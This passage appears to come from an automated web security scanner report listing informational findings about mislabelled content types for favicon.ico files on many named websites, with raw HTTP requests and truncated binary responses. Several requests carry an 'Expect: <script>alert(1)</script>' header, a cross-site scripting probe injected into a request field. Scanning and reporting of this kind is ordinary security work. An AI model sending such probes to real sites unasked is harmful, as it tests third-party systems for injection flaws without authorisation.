User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.purplepug.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Fri, 23 Apr 2010 05:27:32 GMT
ETag: "13e-484e0af187900"
Accept-Ranges: bytes
Content-Length: 318
Content-Type: text/plain; charset=ISO-8859-1
Date: Tue, 03 May 2011 10:59:33 GMT
Connection: close

..............(.......(....... ...............H...H...................DBD.....$"$.....dbd.............TRT.....424.....trt..w..wwwwwwwwww.{w.{w{w...ww{wy
].g.w{0.{}.w{w.ww{..ww.www.gw..w{wq..w0a....w{q
...[SNIP]...

31.196. http://www.quizasaurus.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.quizasaurus.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.quizasaurus.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:40:58 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 02 Oct 2009 21:28:30 GMT
ETag: "13bb3b-57e-474fa71fe9b80"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...................................`w}.....e...s...\...>...o...\.......r...h...l...g.......Br..l...Bn..e...a...g...`...q...~...s...o...y.......c...`...f...W...l...6g..e.
...[SNIP]...

31.197. http://www.racerxonline.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.racerxonline.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.racerxonline.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:23:21 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 30 Dec 2010 21:22:12 GMT
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: public
Expires: Sat, 17 Jul 2012 20:00:00 GMT
Connection: close
Content-Type: text/plain

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

31.198. http://www.rauantiques.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.rauantiques.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rauantiques.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:11:55 GMT
Server: Apache/2.2.11 (Unix)
Last-Modified: Tue, 21 Apr 2009 19:20:08 GMT
ETag: "3228dd0-47e-4681588f1ea00"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain

............ .h.......(....... ..... .................................................................................................................................... ..............................
...[SNIP]...

31.199. http://www.realemoexposed.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.realemoexposed.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.realemoexposed.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:56:31 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 30 Apr 2010 19:48:15 GMT
ETag: "f0cabc-47e-485798625bdc0"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ....................................................y.................../eee.............................+++....................w...............................
...[SNIP]...

31.200. http://www.realitytvcalendar.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.realitytvcalendar.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.realitytvcalendar.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:56:52 GMT
Server: Apache
Last-Modified: Fri, 29 Oct 2010 13:01:56 GMT
ETag: "136405b-e36-4ccac5c4"
Accept-Ranges: bytes
Content-Length: 3638
Content-Type: text/plain

..............h...&... ..............(....... ...........@............................mH.=Pw...%.....|o..E%........K.......E..0F.llY.[O3...#..M6..ub.ak......BEM...7.........!Bl..}6.;;-.....N]e.j9-.-.
...[SNIP]...

31.201. http://www.redlandsdailyfacts.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.redlandsdailyfacts.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.redlandsdailyfacts.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 03 May 2011 10:42:38 GMT
Content-Length: 15
Connection: close

File not found.

31.202. http://www.remanufactured.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.remanufactured.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.remanufactured.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Tue, 03 May 2011 10:50:17 GMT
Server: Apache
Content-Length: 20
Content-Type: text/html; charset=iso-8859-1

Expect not supported

31.203. http://www.rugdoctor.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.rugdoctor.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=ISO-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rugdoctor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:27:03 GMT
Server: Apache
Last-Modified: Thu, 21 Apr 2011 14:08:38 GMT
ETag: "57e-4716e580"
Accept-Ranges: bytes
Content-Length: 1406
Cache-Control: max-age=31536000
Expires: Wed, 02 May 2012 10:27:03 GMT
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

..............h.......(....... ................................................x...Z...<..........................o.o.W.W.@.@..................w...Z...=... ..........s...d...U...F.o.7.W.(.@...........
...[SNIP]...

31.204. http://www.runningwarehouse.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.runningwarehouse.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.runningwarehouse.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

31.205. http://www.sa-venues.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.sa-venues.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=iso-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sa-venues.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:40:44 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sat, 20 Jun 2009 11:03:12 GMT
ETag: "2d38c76-1536-46cc596405c00"
Accept-Ranges: bytes
Content-Length: 5430
Content-Type: text/plain; charset=iso-8859-1

............ .h...&... .... .........(....... ..... .....@.......................................................*..0*...........*..@*..`........................................*...*...*.......*..`*.
...[SNIP]...

31.206. http://www.satellitesales.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.satellitesales.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

31.207. http://www.scrapjazz.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.scrapjazz.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=ISO-8859-1

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.scrapjazz.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:49:28 GMT
Server: Apache/2.0.59 (CentOS)
Last-Modified: Fri, 01 Apr 2005 22:08:28 GMT
ETag: "12c0e1-13e-3ff94f00"
Accept-Ranges: bytes
Content-Length: 318
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

..............(.......(....... .........................................................................................................................................................................
...[SNIP]...

31.208. http://www.servpro.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.servpro.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

31.209. http://www.slipstick.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.slipstick.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

31.210. http://www.snaz75.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.snaz75.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.snaz75.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Tue, 03 May 2011 10:22:29 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.211. http://www.soundspectrum.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.soundspectrum.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.soundspectrum.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:32:48 GMT
Server: Apache
Last-Modified: Thu, 04 Oct 2007 15:31:12 GMT
ETag: "128242-57f-79e05000"
Accept-Ranges: bytes
Content-Length: 1407
Content-Type: text/plain; charset=UTF-8

..............h.......(....... .......................................................................................................................6...U......b...N...............................2.
...[SNIP]...

31.212. http://www.speedysigns.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.speedysigns.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.speedysigns.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:54:47 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 08 May 2009 13:14:14 GMT
ETag: "10d97e4-47e-4696667afd580"
Accept-Ranges: bytes
Content-Length: 1150
Vary: User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ................................................J....-C..:X.........<..................................."....A`..*>..Wx..Hi..%,..\{.....e..........................
...[SNIP]...

31.213. http://www.sportsinjurybulletin.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.sportsinjurybulletin.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sportsinjurybulletin.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:07:58 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 15 Oct 2008 05:14:04 GMT
Accept-Ranges: bytes
Content-Length: 350
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 11:07:58 GMT
Vary: User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

..............(.......(....... ........................................................................{...c...Z...R..............t....0......;@..C....j0.\P............l...@.....l......|.......,.@4B..
...[SNIP]...

31.214. http://www.srv17.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.srv17.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 03 May 2011 10:24:03 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 9

not found

31.215. http://www.stanleyblackanddecker.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.stanleyblackanddecker.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.stanleyblackanddecker.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:46:51 GMT
Server: Apache/2.2.9 (Ubuntu) mod_ssl/2.2.9 OpenSSL/0.9.8g
Vary: Accept-Encoding
Content-Length: 45
Content-Type: text/html; charset=iso-8859-1

The requested file favicon.ico was not found.

31.216. http://www.stepbystepcc.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.stepbystepcc.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.stepbystepcc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:25:47 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html; charset=iso-8859-1
Age: 0
Proxy-Connection: close
Server: YTS/1.19.8

<h1 style='color:#497A97;font-size:12pt;font-weight:bold'>404 - Not Found

31.217. http://www.stereophile.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.stereophile.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.stereophile.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:34:33 GMT
Server: Apache/1.3.34 (Unix) PHP/5.2.6 mod_perl/1.29
Content-Type: text/html; charset=iso-8859-1
Content-Length: 45

The requested file favicon.ico was not found.

31.218. http://www.stlbeacon.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.stlbeacon.org
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.stlbeacon.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:21:07 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 21 Jan 2010 20:27:43 GMT
ETag: "663ea76-37e-89006dc0"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain

..............h.......(....... .....................................yVVd<<d<<d<<.cc..............................nIId<<.......ppd<<............................}}d<<mHH.................................
...[SNIP]...

31.219. http://www.stockingsjerk.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.stockingsjerk.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.stockingsjerk.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:17:17 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 10 Mar 2011 08:42:21 GMT
ETag: "1268067-57e-49e1cd2dfd540"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...............................KKK.NNN.888.BBB.333.OOO.SSS.777.;;;.???.MMM........AAA.@@@.DDD.VVV.....444.CCC.999.TTT......z..GGG.....EEE.rn{..w...l..hhh.PPP.c`m.bbb..~
...[SNIP]...

31.220. http://www.straight.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.straight.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.straight.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:17:38 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 07 Nov 2006 23:44:52 GMT
ETag: "38073f-57e-421b0c9e48500"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... .......................................^]].....hdb.....YWV.....hgg.....IFD..-,.**).....III.vut.qoo.nll.
.'$#.!...................................ljh.TPN.....snk.wtr.pn
...[SNIP]...

31.221. http://www.studentscholarshipsearch.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.studentscholarshipsearch.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.studentscholarshipsearch.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:05:41 GMT
Server: Apache
Last-Modified: Wed, 29 Sep 2010 20:23:46 GMT
Accept-Ranges: bytes
Content-Length: 15086
Cache-Control: max-age=29030400, public
Expires: Tue, 03 Apr 2012 11:05:41 GMT
Content-Type: text/plain; charset=UTF-8

......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......$............................................................................................................................
...[SNIP]...

31.222. http://www.sub5zero.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.sub5zero.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sub5zero.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:26:04 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 01 May 2010 06:17:29 GMT
ETag: "289f50-57e-50761040"
Accept-Ranges: bytes
Content-Length: 1406
Cache-Control: max-age=1209600
Expires: Tue, 17 May 2011 11:26:04 GMT
Connection: close
Content-Type: text/plain

..............h.......(....... ...........@................................@@@..... .....___.........000.............OOO.ppp.QQQ.............///.....```...........................................
...[SNIP]...

31.223. http://www.superglossary.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.superglossary.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.superglossary.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:24:37 GMT
Server: Apache
Last-Modified: Sun, 13 Mar 2011 18:46:31 GMT
ETag: "110a739-37e-49e619d1c59cb"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain

..............h.......(....... ...............................oP.]?\?\?\?\?\?]?\?\>\>\?\?\>]?J2
.r0.^.._.._.._.._.._..^.._.._.._.._..^.._.._.kI..r0._..a..c..l'.u4.}@..M.}@.u4.g!._.._.._.
...[SNIP]...

31.224. http://www.svideo.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.svideo.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=iso-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.svideo.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Tue, 03 May 2011 10:37:33 GMT
Cache-Control: private
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 19

expectation failed"

31.225. http://www.sztaki.hu/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.sztaki.hu
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sztaki.hu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:58:56 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 06 Feb 2006 15:51:18 GMT
ETag: "f09a4-57e-3bc48980"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain

..............h.......(....... ...............H...H.......................f...3...................f...3...................f...3........f...f...f..ff..3f...f...3...3...3..f3..33...3..............f...3.
...[SNIP]...

31.226. http://www.tacori.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.tacori.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tacori.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:17:53 GMT
Server: Apache
Last-Modified: Mon, 07 Mar 2011 23:15:26 GMT
ETag: "660660-57e-49decabbd5f80"
Accept-Ranges: bytes
Content-Length: 1406
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Content-Type: text/plain

..............h.......(....... ...............................}........
...
..3)..wq..(...(...F>..F>..bZ..yt..B9..B9..SK......>4..>4.}....3*..-"..3*..wr..me.~........................B:......B:..SL..>
...[SNIP]...

31.227. http://www.tatravelcenters.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.tatravelcenters.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
Date: Tue, 03 May 2011 10:28:49 GMT
Content-Length: 60

The page cannot be displayed because the expectation failed.

31.228. http://www.tbd.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.tbd.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tbd.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 25 Apr 2011 21:28:06 GMT
ETag: "3880419-37e-4a1c4e21c2580"
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=300
Expires: Tue, 03 May 2011 10:31:34 GMT
Date: Tue, 03 May 2011 10:26:34 GMT
Content-Length: 894
Connection: close

..............h.......(....... ...........@....................s..m..i..g..g..i..k..n..o..o..o..o..p..r..s..u..n..f..`..]..].._..b..d..e..e..e..e..g..i..k..n..j..`..Y.yT.yT.|V.~X..Y..Z..Z..Z..[..\..^.
...[SNIP]...

31.229. http://www.texasbowhunter.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.texasbowhunter.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.texasbowhunter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:35:15 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 26 Mar 2010 02:17:10 GMT
ETag: "1788324-57e-482aac2bc1580"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...............................RR............|..J)......u].y!D..,...+..MM......_E;..1.....\G>.....|}|.})O.RNL......*...*...|v.kH;......z{z.PLJ..mT..0 ..4...6..ifd.PP
...[SNIP]...

31.230. http://www.theacc.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.theacc.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
